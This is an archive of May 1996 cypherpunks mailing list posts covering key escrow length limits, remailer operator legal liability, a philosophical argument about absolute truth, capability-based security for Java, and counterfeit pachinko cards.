frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@XENON.chromatic.com>
Date: Sat, 25 May 1996 12:07:35 +0800
To: cypherpunks@toad.com
Subject: why is no one (apparently) worried about escrowed key length limits?
Message-ID: <199605241756.KAA07067@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


It appears that (from the responses I have gotten on why there are key
length limits at all on escrowed encryption) I am not forgetting
anything obvious.

So why is no one seriously questioning why this limit has to be there
for key escrow?

One suggestion was: the NSA does not completely trust key escrow.  But
if the NSA (who should know all the inner secrets of it) cannot
completely trust key escrow, then why should WE trust key escrow?

Obviously, the implication is that brute force (or "near brute force")
methods WILL be used against encrypted transactions.  So in the best
case, there is some lower strata of law enforcement who are only
allowed to use the escrowed path to intercept, but there is also some
upper strata of law enforcement (presumably some anti-terrorist or
national security section of ATF or FBI or CIA or Secret Service) who
will be allowed to use such super-duper cracking methods to achieve
their goals (assuming their goals are good).

But, if the best case happens, then we're all Ozzie and Harriet (or
Archie and Edith), and we should be in a love fest with the
government.  Obviously we don't competely and blindly trust our
government.

So why do we allow the NSA to get away with such a policy?

"Here is something you can use.  We can't completely trust it but it
should be good enough for you folks."

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Fri, 24 May 1996 22:02:31 +0800
To: Jim Choate <ravage@ssz.com>
Subject: [PHILOSOPHYPUNKS] Re: Innocence & harmless weapons (fwd)
In-Reply-To: <199605240530.AAA23158@einstein.ssz.com>
Message-ID: <199605240904.LAA16191@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Jim Choate <ravage@ssz.com> wrote:
> 
> > From: Sandy Sandfort <sandfort@crl.com>
> >
> > That was a capital "T", bub.  Truth doesn't have sides.  (Think
> > of it as an archetype.)
> 
> Sorry but the very fact that I don't agree with you is proof enough that
> there is no absolute 'Truth' as you use it.


Hm.  So you are using the implied premise, Jim, that if there
were an absolute 'Truth' that you would know it?  I find that 
somewhat amusing.  :-)


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaV7j0jbHy8sKZitAQGP2wMAq9MTFw9Mamepgp58aTRjae2VqFDDJfVn
78LdugL+f6Kd0X4I5nfWs6EEKlItchtmCFxu2sUGKL55igk1D+z+hCfgZflWUocU
mECzMzX3Al3HinsunA3NBW4zY61jpCuW
=Wnod
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 25 May 1996 10:52:41 +0800
To: Ernest Hua <hua@XENON.chromatic.com>
Subject: Re: Layman's explanation for limits on escrowed encryption ...
Message-ID: <199605241805.LAA11918@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, Ernest Hua wrote:

> Could someone with some knowledge of NSA/DoS/FBI intentions please
> explain why key length limitations are necessary for escrowed
> encryption?

In their paper (Enabling Privacy, Commerce, Security and Public Safety in
the Global Information Infrastructure), McConnell and Appel state that they
are willing to allow 80 bit GAKed hardware to be exported, but only 64 bit
software.  They state the reason for this difference is because it is
harder to hack the hardware to defeat the GAK.

Now we all know that, should this proposal be adopted, the four horsemen
will use some non-GAKed cypher system, e.g. PGP, inside the GAKed envelope.

When privacy is outlawed, only outlaws will have privacy.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 25 May 1996 10:31:58 +0800
To: Sandy Sandfort <ravage@ssz.com>
Subject: Re: PILATE SAYETH UNTO HIM...
Message-ID: <199605241813.LAA07195@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:43 AM 5/24/96 -0700, Sandy Sandfort wrote:

>On Fri, 24 May 1996, Jim Choate wrote:
>
>> Sorry but the very fact that I don't agree with you is proof enough that
>> there is no absolute 'Truth' as you use it. 
>
>It isn't obvious that we DON"T agree.  It was still a question.
>Actually, I rather fancied Bell and May's responses.

I just dragged out my copy of a book titled "A Bodyguard of Lies," by 
Anthony Cave Brown.  It's a book on the various deception strategems used 
against the Germans in the latter part of WWII.    This deception plan was 
given the code-name, "Bodyguard", because Churchill had said in Tehran that 
"In war-time, truth is so precious that she should always be attended by a 
bodyguard of lies."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 25 May 1996 05:43:38 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: VIRUS ALERT: Java virus that affects Netscape 2.0 & 2.01.
In-Reply-To: <199605241245.HAA22317@homeport.org>
Message-ID: <Pine.SUN.3.91.960524112055.13979A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Actually, a more canonical Perry policy would probably be to only allow code 
signed by Perry (or the security audit team) to be executed [trust only 
yourself] vs [trust nobody, not even your self]

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 05:34:11 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: ecash representation
In-Reply-To: <199605221908.PAA23731@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.93.960524112822.657B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




A collegue of mine is taking a position where he will be recommending
secure communications technologies to various big money clients.

He asked me if I could drum up some contacts for him.

Do you have a fact sheet on Piermont I might give to him?

He could be in a position to generate significant business for a
consulting firm which really knew the ins and outs of strong encryption.

I'd also be interested for my own reasons.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 25 May 1996 07:46:08 +0800
To: cypherpunks@toad.com
Subject: PILATE SAYETH UNTO HIM... (fwd)
Message-ID: <199605241639.LAA24014@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hiya Sandy,

Forwarded message:

> Date: Fri, 24 May 1996 07:43:06 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: PILATE SAYETH UNTO HIM...
> 
> It isn't obvious that we DON"T agree.  It was still a question.

If there was an absolute Truth as you postulate the results would 
be many and varied. For instance,

1.  If the Truth were absolute everyone would have to accept it as such
    even if they disagreed or said it wasn't the Truth, In essence it
    would at the same time create the ultimate Lie. This leads to a logic
    inconsistancy, something can't be the ultimate Truth and at the same
    be the ultimate Lie AND and claim no relativity applies. If you allow
    relativity into your argument then it is clear that the subject of
    study is not an ultimate anything.

2.  What is the litmus test for ultimate Truth? How do you tell it from
    regular truth? How do you tell it from a lie? From the Lie?

3.  If there were a ultimate Truth then this implies that it is possible
    to have a system which can fully describe itself. Godel's Incompletenes
    Theorem would be found invalid, which by extension would have some wide
    spread ramifications for the rest of our knowledge base.

4.  An ultimate Truth would philosphicaly be inseperable from God. Being
    a pantheist, you are going to have a hard time floating that boat in my
    pond.

5.  An ultimate truth would imply that all existance conformed or was aware
    of the ultimate Truth. In essence you are claiming that truth and
    falsity (good/bad) exist as a absolute and not a consequence of human
    psychology. I would be very interested in your reasoning regarding how
    a rock on the other side of the Magellanic Clouds could be effected by
    a ultimate Truth.

6.  I suspect that any ultimate Truth would have to be so trival it would
    be useless. Tautologies are worthless for proving anything.

7.  On the issue of postulates (ie unprovable assumptions necessary for
    the creation of a logical framework - Godel rears its ugly head again)
    the implication is that we can now prove Euclids 5 postulates
    absolutely. I am shure many mathematicians would be interested in this.


> Actually, I rather fancied Bell and May's responses.  To the
> extent we do disagree reflects in no way on the Truth, only in
> our abilities to determine what Truth is.  Again, think of it
> as an archetype or reality not as a popularity contest.

Which reality? Yourse, mine, a photons? To a photon the entire universe
is the photon. Would your Truth be true for it? It is obvious that its
truth's are not valid for us (unless you are claiming we are all everywhere
at once). If there is no one absolute Reality how can there be a absolute
Truth?

> Nope, not me.  Hell, I don't even claim *partial* omnipotence.
> You really have to pay attention to those details.  Why are you
> having so much trouble understanding the question mark?

I understand it quite well. Why are you having so hard a time giving me
a straight answer?

> > Nice tactical ploy, an ad hominem buried in a straw man argument.
> 
> Thanks, but you got it wrong again.  Yes, there was an indirect
> (and apparently valid) ad hominem, but apparently you do not know
> what a straw man is.  For your edification, your out-of-left-field
> suggestion that my discussion of Truth represents some claim of 
> omnipotence on my part is clearly a straw man (and an implied ad
> hominem, for good measure).

If you admit fallibility then how can one claim to recognize a ultimate
anything, let along Truth? Hardly a left field question as you claim.

It doesn't qualify as ad hominem because it was not directed at a
personality but rather at your basic theoretical assumptions. It is completely
valid (and necessary I might) to both question basic postulates
(otherwise non-Euclidian geometry would not have existed) as well as to
clearly elucidate what those postulates are. You did not do that, I simply
asked for clarification. I have never made a attack on personality as a
basis for any of my discussion on this list. I have made some comments to 
folks about the way they treated others, but this is clearly different than a
discourse on a technical issue. At no point have I implied covertly or
otherwise any statement about anybody on this lists intelligence or ability
to reason being a reflection of their basic worth as a human being. I accept
you each as being basicly worthy of respect for no other reason than you
simply exist. Whether a particular individual was right, wrong, or simply
holds a radicly different view than myself is not sufficient reason for me
or anyone else to judge anothers worth. An ad hominem is the embodyment of
measuring a persons intrinsic worth by their ability to argue or hold an
opinion (or spell). To my way of thinking, if the only bitch you have about
a argument is whether it was spelled correctly each time, you don't have
much to say worth listening to.

My responce does not qualify as a straw man argument because I am discussing
your original claims, not drawing an analogy and claiming equivalence. You
were drawing  an analogy and claiming equivalence. I have asked several
times if you would accept or believe other situations to be similar, hardly
the same as a straw man since you did not ask if others thought they were
equivalent but simply stated it as such.

To the point, I don't care where the theory came from (ever), I simply want
to know if it works. If I had my way the discussion on this list would never
have a personality attached to it, complete anonymity.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 06:58:09 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <01I50N2UZXFI8Y4X9G@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960524113302.657C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 22-MAY-1996 19:03:58.98
> 
> >On Tue, 21 May 1996, Ben Holiday wrote:
> 
> >> On Tue, 21 May 1996, Daniel R. Oelke wrote:
> 
> >>> The second is to simply include the
> >>> consent-code along with the encrypted peice of mail and a legal notice
> >>> stating that decryption of the mail constitutes your consent to receive
> >>> the mail, as well as your agreement to hold the remailer-operator harmless
> >> 
> >> By reduction - you could just do a rot13 on the message and 
> >> append the "legal notice".   If all the information for decoding
> >> a message is present in that message, is a different encoding
> >> mechanism really any different from straight ASCII text?  
> >> (i.e. Netscape 9.13 might have auto decoding built it....)
> >> Then, the user doesn't do anything "extra" - does this invalidate 
> >> the notice?
> 
> >A person has notice of a fact if he knows the fact, has reason to know it,
> >should know it, or has been given notification of it.  Restatement,
> >Second, Agency section 9.
> 
> >The important issue here is what constitutes constructive or implied 
> >notice (the second example above).
> 
> >Constructive notice exists where a party could have discovered a fact by
> >proper diligence and where the situation casts a duty on him to inquire
> >into the matter.
> 
> >A person who has _actual_ notice of circumstances which would set of the
> >"alarm bells" of a prudent person has constructive notice of the issue
> >itself where a notice clause was available and easily referenced.
> 
> >See F.P. Baugh, Inc. v. Little Lake Lumber Co., 297 F.2d 692, 696.
> 
> >Also comes the question what notice is adequate?  Notice reasonably
> >calculated, in all circumstances, to apprise all interested parties of
> >actionm and opportunity to present their objections, says U.S. v San Juan
> >Lumber Co., 313 F.Supp. 703, 709.
> 
> >I'm not going to discuss what constitutes a legal agreement here for the
> >purposes of waiving rights to hold the remailer operater harmless.  These
> >are traditionally unnegotiated agreements that courts are not likely to
> >want to enforce.  (Back of a ski lift ticket, notice that the garage is
> >not responsible for theft).
> 
> 	Umm... the RSA licensing agreement isn't exactly a negotiated contract.
> What makes the difference between the contract in question and the RSA
> licensing agreement (to use it as an example)?

One is trying to remove liability for a tort, the other is instructing
the purchaser on the conditions of use.

While a ski-lift ticket could be considered a "license" to use the
property, selling an actual intellectual property ITEM makes the limiting
terms of its purchase a bit easier for a court to stomach.  Telling a
licensee that if he gets hurt its too bad, and telling one that he cannot
call a function or copy the work are fairly distinct in this way.

In the practical world, the plaintiff who is trying to enforce a software
licensing agreement is much better off than a defendant trying to resist
liability for a tort.

It's a question of appearances which can get lost in the nuances of
definition and technicality.

> >If a court feels that the remailer operator is being negligent or some
> >such, a notice like you are talking about is not likely to be very
> >effective.
> 
> 	Part of this depends on negligent in what sense. If, due to the
> message being encrypted, the remailer operator couldn't read it to see if it
> was copyright-violating anyway, would he/she be negligent to send it on?  

That depends.  If there was reason to believe, for instance, that the
message might indeed be four-horseman type (as a plaintiff's attorney I
would jump all over any messages which came from "soandso@PLO.com" or
somesuch) then negligence becomes an issue regardless.  Perhaps the host
was the site from which other nastiness was mailed?  Anything that could
be shown to put the operator on effective, implied, or constructive notice
that something was amiss.

Remember, technical savvy judges are few and far between.  Technical savvy
juries are nearly non-entitites.  My concept of what is or is not
suspicious when it comes to such things is going to be much more
sophisticated than that of a judge or jury in most if not all cases.

This is an important point.

The truth of the matter is entirely pointless in the U.S. Judicial system.
The APPEARANCE of the matter is key.

'punks seem to forget this in all their discussion of what a court might
do because, simply put, they know more than 99% of the population about
the subject.
 
> >I find that making the user decrypt the message as acceptance of the mail
> >is clever, but what exactly does it accomplish?  The user can still have
> >his copyrights violated in the text, what does it matter that he did or
> >did not accept the mailing?
> 
> 	The primary use of the contract is to avoid complaints from the user
> for "harrassing" email, not to avoid copyright problems.

>From the recipiant?
I would simply put a notice of where complaints can be directed to, and
publish a stated (and carefully worded) policy for addressing abuses.

This will go a LONG way to insulating remailer operators.

"Your honor, my client has made every effort to filter the legitimate
users of his system from the illegitimate.  He has a stated policy
regarding complaints and investigates them to the full extent of his
ability in every case in which a complaint is filed.  Even as this is so,
he can no more completely assure that harassing messages will never slip
through than can the U.S. post office protect every citizen from mail
bombings."

Or some such.  If you can say this in court and back it up, you're in
better shape.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 06:26:55 +0800
To: Ernest Hua <hua@XENON.chromatic.com>
Subject: Re: Layman's explanation for limits on escrowed encryption ...
In-Reply-To: <199605230053.RAA28116@ohio.chromatic.com>
Message-ID: <Pine.SUN.3.93.960524114646.657D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, Ernest Hua wrote:

> Could someone with some knowledge of NSA/DoS/FBI intentions please
> explain why key length limitations are necessary for escrowed
> encryption?

To deal with the possibility that someone might slip through the cracks of
the escrow process.

Insurance.

> 
> Please reply by E-Mail.
> 
> Thanks!
> 
> Ern
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 06:28:54 +0800
To: Martin Minow <minow@apple.com>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <v02140b02adc99220960b@[17.202.12.102]>
Message-ID: <Pine.SUN.3.93.960524114856.657E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, Martin Minow wrote:

> Black Unicorn <unicorn@schloss.li> comments on the responsiblity
> of prudent persons (in, I presume, the context of threating e-mail
> sent through an anonymous remailier).
> 
> I'm still perplexed: what can a "prudent" remailer operator do if a
> threatening e-mail was sent through a remailer under one or more of
> the following conditions:
> 
> -- The remailer operator is legally enjoined from reading messages
>    transversing his system. (For example, the remailer is subject to
>    data privacy laws.)

Nothing.  Perhaps block e-mail from the address the threat mail was sent
from after a certain number of legitimate complaints.

This, of course, depends on the threats/whatever being sent to the
remailer in question as a 'first in chain' mailer.

> -- The message was encrypted using the intended recipient's public key.
>    (This means that, without access to the private key, the operator
>    has no mechanism to examine the e-mail.)

Ask the recipient if he or she wishes all encrypted mail addressed to his
or her key to be supressed.

> Confused in Cupertino.
> 
> Martin Minow
> minow@apple.com
> 
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 06:32:02 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199605230539.WAA09625@netcom21.netcom.com>
Message-ID: <Pine.SUN.3.93.960524115441.657F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, it was written:

> The answer to information is more information.

The answer to your question lies within the question itself.

Now go away.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 25 May 1996 14:37:11 +0800
To: Black Unicorn <hua@XENON.chromatic.com>
Subject: Re: Layman's explanation for limits on escrowed encryption ...
Message-ID: <199605241914.MAA10326@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:47 AM 5/24/96 -0400, Black Unicorn wrote:
>On Wed, 22 May 1996, Ernest Hua wrote:
>
>> Could someone with some knowledge of NSA/DoS/FBI intentions please
>> explain why key length limitations are necessary for escrowed
>> encryption?
>
>To deal with the possibility that someone might slip through the cracks of
>the escrow process.

However, this escrow process is claimed to be _voluntary._  And good, 
non-escrowed encryption already exists today, outside the US.  It won't be 
"slipping through the cracks," it'll be like opening the floodgates.  So the 
question is still open:  Why key-length limitations on export?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 25 May 1996 13:38:50 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Anarchy Online
In-Reply-To: <Pine.GUL.3.93.960524104321.29645B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.3.89.9605241244.A21325-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


A shame that Charles didn't give you all the credit you so rightfully
deserve. Holocaust fetishists need all the press they can get. :)

Perhaps he thinks you're a net.loon -- I do suggest you ask him! 

Yours truly,

Declan



On Fri, 24 May 1996, Rich Graves wrote:

> Date: Fri, 24 May 1996 10:50:05 -0700 (PDT)
> From: Rich Graves <llurch@networking.stanford.edu>
> To: Declan McCullagh <declan@well.com>
> Cc: "Timothy C. May" <tcmay@got.net>, jim bell <jimbell@pacifier.com>,
>     cypherpunks@toad.com, cp@panix.com
> Subject: Anarchy Online
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Thu, 23 May 1996, Declan McCullagh wrote:
> 
> > On Thu, 23 May 1996, Timothy C. May wrote:
> > > >At least we now know that the National Journal hasn't heard of
> > > >Cyber-Anarchy--- or they didn't understand one word of it.
> > > 
> > > What is this "cyber-anarchy" (or "Cyber-Anarchy") you keep talking about?
> > 
> > Heh. Check out http://anarchy-online.dementia.org/book/ for Charles 
> > Platt's "Anarchy Online."
> > 
> > (Did I mention it here before? Charles talks about a few things we've
> > discussed here, like the Zundel mirrors, Marty Rimm, and the fight over 
> > the CDA.)
> 
> Yeah, you'd mentioned it, but I hadn't read it until just now. I see he
> mentions me on http://anarchy-online.dementia.org/book/section.2.html, but
> my name is badly misspelled; it starts with "R," not "D." Donna's name is
> badly misspelled, too, early on. 
> 
> I wholeheartedly support his conclusions, by the way. They're based on
> a number of incorrect premises, but any fictions are convenient ones. 
> 
> http://www.stanford.edu/~ajg/project.html
> http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html
> 
> - -rich
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMaX2m43DXUbM57SdAQFnWwP8DZQJL7aNCYR7P8nE/A1oRNI6IaxiUbY/
> AqSWhr1WC+HjbE+V+790u7a+C4doMe7Ay+sxTe5jQpuFrExE3hMDPN7xjoxQ9rK/
> MTX0pdxKIfyZDQxDV/XaxjtdMn5zH/0Ye6C+hC9QuZ8s++l3y7IuiENwOM6BYNi1
> qVuzInNA3OI=
> =AWhp
> -----END PGP SIGNATURE-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 06:56:09 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <199605232231.PAA13882@netcom20.netcom.com>
Message-ID: <Pine.SUN.3.93.960524121932.657K-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 May 1996, Mike Duvos wrote:

> Sameer Parekh writes:
> 
> > 	It's my understanding that this statement is now false. I
> > believe that Matt Blaze recently received "The Briefing" and he is
> > still on our side.
> 
> Don't suppose Matt could do a little executive summary of 
> "The Briefing" and post it to the list, could he?

Probably not unless he wanted to do time.

I suspect some anonymous person might put bamboo shoots under his
fingernails and post the results of the interrogation however.

> 
> --
>      Mike Duvos         $    PGP 2.6 Public Key available     $
>      mpd@netcom.com     $    via Finger.                      $
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 25 May 1996 13:02:41 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Truth can sometimes be harmful...(talk.cpunks.truth)
Message-ID: <01BB496C.7E658A60@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Sandy Sandfort

This is the most concise and logical response yet, to my
suggested answer of "Truth" to Bell's question.  Blanc has
masterfully shown why that dog won't hunt.
...........................................................................

Thanks for the compliment, Sandy.

I understood what you meant.   I appreciate the general nature of truth, in spite of the possibilities for misinterpretations of or prevarications from it. 

Jim, a quote for you:

	"We are able to act at all - that is to say, we have the power 
	to order our conduct in such a way that the ends we desire 
	can be attained - only because the phenomena of the world 
	are governed not by arbitrariness, but by laws that we have 
	the capacity to know something about.  If it were otherwise, 
	we should be completely at the mercy of forces that we should 
	be unable to understand." 
				~ Human Action, Ludwig Von Mises

Substitute the word "truth" for "laws" and it makes equal sense.  We would be at the mercy of forces that we could not control, if our perceptions and interpretations could not correspond to the actual, the real, the truth.

(and anyway, what does God have to do with crypto? 
Never mind....)

     ..
Blanc







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 25 May 1996 06:45:58 +0800
To: Martin Minow <minow@apple.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <v02140b03adcb89cf7df7@[17.128.203.188]>
Message-ID: <Pine.SUN.3.91.960524120245.14091A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Martin Minow wrote:

> 
> The briefing might go something like this: "Remember the terrorist bombing of
> the Libian Embassy? Well, "they" were planning to bomb the <??> embassy,
> but we intercepted their messages and prevented the attack.
> 

Libyan embassies don't get bombed. They just have thugs shooting unarmed 
WPCs from them under protection of diplomatic immunity (I used to live in 
Pimlico, and went to college in South Kensington, and going past the 
Yvonne Fletcher memorial always got me upset

Anyway, they're not just state sponsored terrorists, they're the actual 
terrorist state, and can thus can easily get access to whatever 
crypto they want; in extrimis shipping OTPs by diplomatic pouch; it's the 
smaller, unofficial groups where the case is most easily made.

If I thought that restricting crypto were possible, I might be convinced 
by solid argument along this line, though as a Londoner and having spent 
some time working in Israel, I'm probably easier to convince than most 
people here (just about the only tube station I used to use regularly 
that wasn't hit by the IRA was Chigwell, and that isn't wholly a good 
thing :-). 

However, now that the four horses have gone, and all that's left in the
stable are the my little ponies, why slam the barn door and bop their
noses for no good reason? 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 25 May 1996 01:52:22 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: TILT! Counterfeit pachinko cards send $588 million down the chute.
Message-ID: <199605241243.MAA01566@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Follow-up to Peter Wayner's post yesterday: 
 
 
   The New York Times, May 24, 1996, p. D8. 
 
 
   American Banknote Gets Into Pachinko 
 
 
   The American Banknote Corporation said yesterday that it 
   was developing optical-reading technology for a group of 
   Japanese companies to help prevent counterfeit prepaid 
   cards in the pachinko business. 
 
   Pachinko, which is similar to pinball, is played in some 
   18,000 parlors in Japan and has grown in popularity in the 
   last few years. 
 
   Morris Weissman, American Banknote's chairman, said 
   American Banknote's holographics unit was making cash-value 
   cards and machines to read them. The cards and machines 
   will be tested in Japan in July, and "if certain criteria 
   are met," more will be installed in August, he said. 
 
   He said cards would authorize a person to play a game of 
   pachinko and win money. The cards, he said had "specific 
   algorithms and codes we believe are almost impossible to 
   duplicate." 
 
   ----- 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 25 May 1996 12:03:32 +0800
To: cypherpunks@toad.com
Subject: Re: Runtime info flow in Java
Message-ID: <199605241946.MAA03873@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 AM 5/24/96 -0700, Lucky Green wrote:
>At 20:06 5/23/96, Norman Hardy wrote:
>
>>I am interested in your paper because you define the problem as we do.
>>There are some who think that capability architectures are the solution.
>>There is little information on how to solve these problems with
>>capabilities. I am trying to find time to address some of these issues.
>
>I walked away from your presentation of KeyKOS with the impression that a
>capability system to be secure it would have to be implemented at the OS
>level.
>Can you build a such a system on top of an insecure OS, as Java would have
>to do?

Let me take a couple of stabs at this question.

A lot of the answer depends on what you mean by secure.  For example, if
the Java run-time can successfully contain Java applets so they can't
access any of the unsecured portions of your OS, then it doesn't matter
that those OS holes exist as far as protection from the applets is
concerned.  The proof that the Java run-time actually can do this
containment is left as an exercise for the student :-).

Capabilities could be used to give specific Java applets access to specific
resources on your computer system.  e.g. You could give an applet the
capability to read a file.  In the Java world it would appear as an object
with only one method (read).  The specific applet object instances which
had access to that object could read the file.  Others could not.


A slightly different view of where capabilities might fit in is on a
network of mutually suspicious actors (e.g. the global Internet).  Start by
assuming that each machine is strongly resistant to attack through the
network.  (Ironically, Mac/Wintel platforms may be easier to secure in this
manner than Unix platforms because they have fewer of the compromised
network daemons running.  Firewalls already allow Unix networks to approach
this level of security.)  In this model, you must either trust or contain
all the code you run on your machine.

We can use certificates (ref: SPKI) to implement network capabilities. 
These certificates make statements of the form: The holder of the secret
key which corresponds to this public key is permitted these specific forms
of access to this specific resource on this location (e.g. a URL).  These
certificates can act like capabilities.  They can be passed by creating a
new certificate for the receiver which gives it the privileges implied by
the old certificate.  They can be rescinded in any of a number of ways.

Capability certificates allow you to give access to specific resources on
your machine with public key authentication to prevent spoofing.  Because
they support one or more techniques for the holder to pass the capability
to others, they allow subcontracting computation to other machines in the
network.

I will note in passing that ACLs do not allow for subcontracting.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 25 May 1996 08:29:24 +0800
To: "'cypherpunks@toad.com>
